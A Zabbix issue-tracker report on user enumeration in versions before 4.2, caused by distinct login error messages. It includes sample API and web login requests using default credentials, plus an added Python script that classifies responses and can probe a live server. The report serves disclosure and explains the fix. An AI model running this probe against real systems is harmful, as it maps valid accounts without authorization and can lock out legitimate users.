Project: ZABBIX BUGS AND ISSUES
Issue: ZBX-16532

Zabbix before 4.2 allows User Enumeration


Details

    • Type: Incident report
    • Resolution: Duplicate
    • Priority: Minor
    • Affects Version/s: None
    • Fix Version/s: 4.4.0alpha1
    • Component/s: API (A), Frontend (F)
    • Labels: None

    Description

      Zabbix before 4.2 allows User Enumeration. It is possible to enumerate application usernames based on the different server responses to login requests ("Login name or password is incorrect", "Account is blocked for N seconds", "No permissions for system access").

      API Request

      POST /zabbix/api_jsonrpc.php HTTP/1.1
      Host: company
      Content-Type: application/json-rpc
      
      {
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {
          "user": "Admin",
          "password": "zabbix"
        },
        "id": 1
      }


      Web Interface Request

      POST /zabbix/index.php HTTP/1.1
      Host: company
      Content-Type: application/x-www-form-urlencoded
      
      name=Admin&password=password&autologin=1&enter=Sign+in
      
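      The two requests above differ only in transport; the enumeration signal is the same in both cases: the error text the server picks depends on the state of the account named in the request. The script below is an added example written for this page, not code from the issue reporter or from the Zabbix project. It builds both request bodies, classifies a user.login response by the three messages quoted in the description, and runs offline against constructed responses. The JSON-RPC error layout used in those constructed responses (the text in the "data" field), the "30 seconds" value, and the base URL "http://company/zabbix" in the live probe are assumptions for illustration.

```python
import json
import urllib.parse
import urllib.request

# Error texts quoted in the issue description. Which one the server returns
# for a given login name is the enumeration signal.
SIGNALS = {
    "Login name or password is incorrect": "unknown user or wrong password",
    "Account is blocked": "account exists (temporarily blocked)",
    "No permissions for system access": "account exists (no system access)",
}


def classify(response_body: str) -> str:
    """Map a user.login JSON-RPC response body to an enumeration verdict.

    Login failures come back as a JSON-RPC error object; the text is taken
    from both "message" and "data" because the issue does not say which
    field carries it (assumption).
    """
    doc = json.loads(response_body)
    if "result" in doc:
        return "account exists (credentials accepted)"
    err = doc.get("error") or {}
    text = " ".join(str(err.get(k, "")) for k in ("message", "data"))
    for needle, verdict in SIGNALS.items():
        if needle in text:
            return verdict
    return "unclassified: " + text.strip()


def api_login_request(user: str, password: str) -> bytes:
    """Body of the user.login call shown in the issue, as bytes for POST."""
    return json.dumps({
        "jsonrpc": "2.0",
        "method": "user.login",
        "params": {"user": user, "password": password},
        "id": 1,
    }).encode()


def web_login_request(user: str, password: str) -> bytes:
    """Form body of the index.php request shown in the issue."""
    return urllib.parse.urlencode({
        "name": user, "password": password, "autologin": "1", "enter": "Sign in",
    }).encode()


def probe_api(base_url: str, user: str, password: str = "not-the-password") -> str:
    """Live probe over the network (not exercised offline).

    base_url is an assumption, e.g. "http://company/zabbix".
    """
    req = urllib.request.Request(
        base_url + "/api_jsonrpc.php",
        data=api_login_request(user, password),
        headers={"Content-Type": "application/json-rpc"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return classify(resp.read().decode())


# Constructed responses, one per message quoted in the issue. They are
# illustrative (assumed JSON-RPC error shape), not captured traffic.
CONSTRUCTED_RESPONSES = {
    "ghost": '{"jsonrpc":"2.0","error":{"code":-32602,"message":"Invalid params.",'
             '"data":"Login name or password is incorrect."},"id":1}',
    "Admin": '{"jsonrpc":"2.0","error":{"code":-32602,"message":"Invalid params.",'
             '"data":"Account is blocked for 30 seconds."},"id":1}',
    "guest": '{"jsonrpc":"2.0","error":{"code":-32602,"message":"Invalid params.",'
             '"data":"No permissions for system access."},"id":1}',
}


def enumerate_offline(responses=CONSTRUCTED_RESPONSES) -> dict:
    """Classify each user -> body pair and keep only users confirmed to exist."""
    verdicts = {u: classify(b) for u, b in responses.items()}
    return {u: v for u, v in verdicts.items() if v.startswith("account exists")}


if __name__ == "__main__":
    for user, verdict in enumerate_offline().items():
        print(f"{user}: {verdict}")
```

      Two caveats for anyone reproducing this. "Login name or password is incorrect" on its own does not separate a non-existent login from a wrong password, so only the blocked and no-permissions messages positively confirm an account; an account that only ever answers with the generic message stays ambiguous. The probe is also not read-only: repeated failed attempts against a real account are what trigger the "blocked" message, so the check itself can lock out a legitimate user, and a defender may see it as a burst of failed logins in the audit log. The fix is a single message for every failure regardless of account state.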

      People

        Assignee: zabbix.dev (Zabbix Development Team)
        Reporter: itsecurityco
        Votes: 2
        Watchers: 6